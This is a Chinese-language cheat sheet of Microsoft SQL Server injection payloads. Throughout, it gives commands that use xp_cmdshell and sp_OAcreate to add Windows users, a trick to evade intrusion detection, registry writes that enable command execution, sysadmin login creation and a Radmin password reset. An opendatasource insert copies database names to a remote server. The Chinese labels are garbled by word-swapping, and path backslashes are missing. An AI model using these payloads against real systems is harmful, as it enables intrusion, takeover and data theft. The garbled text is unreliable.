;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:windowssystem32cmd.exe /c net user hacker 123456 /add'

SP_OAcreate建目录:

;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:windowssystem32cmd.exe /c md E:XkCmsVwebForm1111'

成立三个设想目录E盘:

;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:inetpub wwwrootmkwebdir.vbs -w "默认 Web 站点" -v "e","e:"'

设置虚构目录E为可读:

;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:inetpubwwwrootchaccess.vbs -a w3svc/1/ROOT/e  browse'

启动SERVER服务:

;exec master..xp_servicecontrol 'start', 'server'

绕过IDS检测XP_CMDSHELL:

;declare @a sysname set @a='xp_' 'cmdshell' exec @a 'dir c:'

开启远程数据库1:

; select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1' )

敞开远程数据库2:

;select * from OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table'

//看看是哪些权限的

and 1=(Select IS_MEMBER('db_owner'))

And char(124)+Cast(IS_MEMBER('db_owner') as varchar(1))+char(124)=1 ;--

//检查实验是或不是有读取某数据库的权限

and 1= (Select HAS_DBACCESS('master'))

And char(124)+Cast(HAS_DBACCESS('master') as varchar(1))+char(124)=1 --

 

数字类型

and char(124)+user+char(124)=0

字符类型

' and char(124)+user+char(124)=0 and ''='

找出类型

' and char(124)+user+char(124)=0 and '%'='

爆客商名

and user>0

' and user>0 and ''='

检查实验是或不是为SA权限

and 1=(select IS_SRVROLEMEMBER('sysadmin'));--

And char(124)+Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1 --

检查测量检验是或不是MSSQL数据库

and exists (select * from sysobjects);--

检查测验是或不是协助多行

;declare @d int;--

恢复 xp_cmdshell

;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--

 

select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

//-----------------------

//      实施命令

//-----------------------

率先开启沙盘格局:

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',1

下一场使用jet.oledb实施系统命令

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:winntsystem32iasias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

试行命令

;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:WINNTsystem32cmd.exe /c net user paf pafpaf /add';--

EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:1111'

判断xp_cmdshell扩张存款和储蓄进度是不是留存:

 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

写注册表

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',1

REG_SZ

读注册表

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindows NTCurrentVersionWinlogon','Userinit'

读取目录内容

exec master..xp_dirtree 'c:winntsystem32',1,1

 

数据库备份

backup database pubs to disk = 'c:123.bak'

//爆出长度

And (Select char(124)+Cast(Count(1) as varchar(8000))+char(124) From D99_Tmp)=0 ;--

改换sa口令方法:用sql综合应用工具连接后,试行命令:

exec sp_password NULL,'新密码','sa'

增加和删除多少个SA权限的客户test:

exec master.dbo.sp_addlogin test,ptlove

exec master.dbo.sp_addsrvrolemember test,sysadmin

去除扩张存款和储蓄过进程xp_cmdshell的语句: 

exec sp_dropextendedproc 'xp_cmdshell'

增多扩大存储过进度

EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:winntsystem32sqllog.dll' 

GRANT exec On xp_proxiedadata TO public

 

停掉或激活某些服务。

exec master..xp_servicecontrol 'stop','schedule'

exec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

只列有个别目录下的子目录。

xp_getfiledetails 'C:InetpubwwwrootSQLInjectlogin.asp'

dbo.xp_makecab

将对象三个档案压缩到某些目的档案之内。

具有要减小的档案都得以接在参数列的最终方,以逗号隔离。

dbo.xp_makecab

'c:test.cab','mszip',1,

'C:InetpubwwwrootSQLInjectlogin.asp',

'C:InetpubwwwrootSQLInjectsecurelogin.asp'

xp_terminate_process

停掉有个别推行中的程序,但赋予的参数是 Process ID。

行使”专门的职业管理员”,透过选单「检查与审视」-「选拔字段」勾选 pid,就可以知见各样实行顺序的 Process ID

xp_terminate_process 2484

xp_unpackcab

解开压缩档。

xp_unpackcab 'c:test.cab','c:temp',1

 

某 机,安装了radmin,密码被改造了,regedit.exe不通晓被删除了或然被改名换姓了,net.exe不设有,未有章程使用 regedit /e 导入注册文件,然而mssql是sa权限,使用如下命 令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEMRAdminv2.0 Server Parameters','Parameter','REG_BINA福特ExplorerY',0x02ba5e187e2589be6f80da0046aa7e3c 就能够修改密码为12345678。假诺要修改端口 值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEMRAdminv2.0 ServerParameters','port','REG_BINA奇骏Y',0xd20400 则端口值改为1234

create database lcx;

Create TABLE ku(name nvarchar(256) null);

Create TABLE biao(id int NULL,name nvarchar(256) null);

//获得数码库名

insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

 

//在Master中创立表,看看权限如何

Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目录里写入一句话马:

//更新表内容

Update films SET kind = 'Dramatic' Where id = 123

//删除内容

delete from table_name where Stockid = 3

本文由澳门新浦京娱乐场网站发布于数据库,转载请注明出处:SQL手工注入,SQL手工注入大全